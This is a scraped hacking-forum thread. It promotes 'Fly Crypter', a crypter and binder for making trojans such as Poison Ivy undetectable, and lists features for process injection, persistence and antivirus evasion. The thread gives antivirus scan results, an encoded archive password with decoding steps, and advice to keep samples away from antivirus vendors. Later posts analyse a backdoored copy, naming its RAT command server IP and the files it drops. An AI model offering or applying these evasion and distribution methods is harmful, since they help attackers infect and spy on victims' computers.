MarricK

################################################## #######
Coder : BUNNN
Made in : Romania, Europe
Gfx by : SpiLoT and Kano
Credits: Cobein Steve10120 Slayer616 SqUeEzEr : D Who! Darkbreak
Beta testers : BlackDark Jonhyk Mi4night Mystik Xenon Goblert Peacefull Hero420 Jumper
################################################## #######

First of all, this is the worst crypter you ever seen with the worst GUI so please don't use it !
This Crypter is not designed to be one 'simple crypter' and is not designed for noob users.








Client Options :
+ multiple binder/crypter/packer/downloader/parameter support
+ binded files and urls are hight crypted with your custom encryption-autogenerate random password for each binded file, you can also chose password level
+ delayed execution for each binded file/url
+ various anti methods by SqUeEzEr
+ custom stub/fake message/delayed execution
+ change icon/clone a file / null pe info / change pe entry point/add new pe section/fix pe checksum/ null pe icon /clone icon/anti padding/EOF data saver / Zero EntryPoint
+ Activex / HKLM / HKCU startup
+ you can chose randomize level 1 - slow , 2 - medium, 3 -hard
+ drop binded/downloaded files to temp/windows/system32/system/drivers
+ inject binded files to this exe/explorer/services/svchost/internet explorer/default browser (use inject file for bypass avs on run time)


Uniq stub generator is for generate your own private stub.
For make it just pres 'generate my stub' then 'compile my stub', if you don't have 'Microsoft Visual Basic 6' you must
install it because vb6 portable don't work on all windowses, also check fly crypter tutorial

Uniq Stub Generator options:
+ 11 stub encryptions: blowfish/twofish/aes/huffman/ds1/tea/skipjack/gost/cryptapi/rc4/xor
+ 4 APis/strings encryptions: Rotx/Ascii/Xor/Hex
+ 3 limiters, for more unique rate
+ all encryptions are full randomized
+ added Huffman, one compression/encryption algorithm, so this is also packer
+ all strings/functions/variables/constants and version info are randomized
+ all functions place in (clas) module are randomized.
+ all possible string and all api's are encrypted with 2 encryptions, first with one custom encryption and last with random rotx encryption.
+ you can chose randomize level 1 - slow , 2 - medium, 3 -hard
+ add fake options / junk code
+ you can put your custom limiters/resource name
+ stub can be compiled to P-Code or Natie-Code
+ add fake APis ( very usefull)
+ scramble code(add goto functions)
+ more unique rate for each stub
*Seems now av's get fly crypter stubs by vb functions, because they don't find any other static code or some malware code.

*Seems now av's get fly crypter stubs by vb functions, because they don't find any other static code or some malware code.

Fly Crypter v2f + USG 0.5.1 with Poison Ivy :
Code:
Fly Crypter v2f + USG 0.5.1 with Cerberus:
Code:
Fly Crypter v2f + USG 0.5.1 with HH Stealer:
Code:

File Info

Report date: 30.1.2010 at 14.53.45 (GMT 1)
File name: FlyCrypterv2.1.exe
File size: 1392640 bytes
MD5 Hash: 4c17e84f7bd379bc71bd67e101595eea
SHA1 Hash: 9733454ACC30290D600895F574E367A3884E2B63
SFX Archive: -
File inspector: -
Detection rate: 1 on 24
Status: INFECTED

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - Trojan-Dropper.VB.3
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
[Only registered users can see links. ]

File Info

Report date: 30.1.2010 at 15.00.27 (GMT 1)
File name: USG0.5.2.exe
File size: 3526656 bytes
MD5 Hash: c3286176315f763e7f4dfab7ebc2e66e
SHA1 Hash: B4D0C1B93517CE0CDBB9FE6E2557607495A0B6EA
SFX Archive: -
File inspector: -
Detection rate: 6 on 24
Status: INFECTED

Detections

a-squared - Trojan-Dropper!IK
Avira AntiVir - TR/Dropper.Gen
Avast - Win32:Malware-gen
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - Trojan-Dropper
Kaspersky - Worm.Win32.Bybz.agb
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - Trojan.VB.Motil
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
[Only registered users can see links. ]

Even if each stub is unique don't upload any stub on virustotal/jotti !!!
Use only [Only registered users can see links. ] with 'Do not distribute the sample' option ENABLED or use [Only registered users can see links. ] !!!

PASSWORD .Zip: Chr$(104) + Chr$(112) + Chr$(108) + Chr$(98) + Chr$(104) + Chr$(100) + Chr$(87) + Chr$(89) + Chr$(87) + Chr$(70) + Chr$(109) + Chr$(99) + Chr$(85) + Chr$(104) + Chr$(88) + Chr$(82)

Decryp with: base64/string reverse/ascii

FYI: I personally use this one....its a big help for making UD your trojans,etc.......i change the pass and re-encode it with slight diffrent method, but anyway...this is it hehe ...MarricK

Download:
[Only registered users can see links. ]


Note: Do Not Reply Ask For Password...staff/admin pls ban if necesary

draaagon

whats this password stuff iz all about ?? any1 can help heer ??

MarricK

direct words from the creator:

This application is free, however, it has a 'anti noob protection', so you are NOT allowed to spread it without my permission.

+Don't reply to fly crypter topic like: "where is password", "how i can decrypt it" .. and so on, else you will be warned.

+Selling/Trading/Giving/Spreading Fly Crypter client/usg/stubs are not allowed without my permission.

+Don't scan usg/client/stubs to 'untrusted online scanners', if we find you then you will be banned.

+Don't reply with 'arhive don't work to be decrypted', else you will be warned.

+Flaming in any way will result a warning.


admin/staff pls consider this admin requests/statement...

draaagon

after some struggle finally i got the crypter n stubmake .. everything went fien untill i crypt file ... and it gave me this error .. any help plzz ..

MarricK

what option did u use on the binder?

draaagon

lastly i put it very simply just put the custom stub and injection to def. browser ... thats it ..still gets this error

and tub i made was rc4 secondly with blowfish but same error at the end ...

MarricK

i notice in ur pic u have usg0.5.exe
the one i have posted has usgo.5.2.exe


if u got it from some other site, might wanna becareful cuz they backdoor, and i've encounter them...as far for the error, no idea about that one, maybe because backdoor...

draaagon

yah that as64 decryption take lot of time (startter like me going to tutorial ist) so i got fom some other forum ... n as far as i guess its clean ... can i post heer or if u telme uva mail ill send it u privately to hav a loot at it

MarricK

well just to make sure, post ur logs in viprasys lab

[Only registered users can see links. ]


as for the file, send me in pm to analyse, upload it somehwhere...

MarricK

i got it

inside of files contents



i check the files u have sent me there in pm, and conduct a test..hopefully is not you who are doing this....but if u open this then,


YOU ARE INFECTED!!

once again, i hope this is not your ip, u put in ur proggy....

Rat trojan

IP address [[Only registered users can see links. ]]: 69.65.19.125
IP country code: US
IP address country: United States
IP address state: Illinois IP address city: Arlington Heights
IP postcode: 60005
IP address latitude: 42.0643
IP address longitude: -87.9921
ISP of this IP [[Only registered users can see links. ]]: GigeNET Organization: GigeNET

virus detail:

Infects/Inject IExplorer.exe
program? spynet port 81

it also install

C:\WINDOWS\system32\wfpn
C:\WINDOWS\system32\wfpn\wfpn.pif
extension instead of "pif" it can be also "dat"
that will be your keylogger data be stored....


How to clean your self?

open process explorer and terminate "Iexplorer.exe" to stop the connection to hacker pc...

report scan in ViprasysLab [Only registered users can see links. ]

hopefully it can be solved form there...

that's why next time do not download from other site unless you know what you doing.......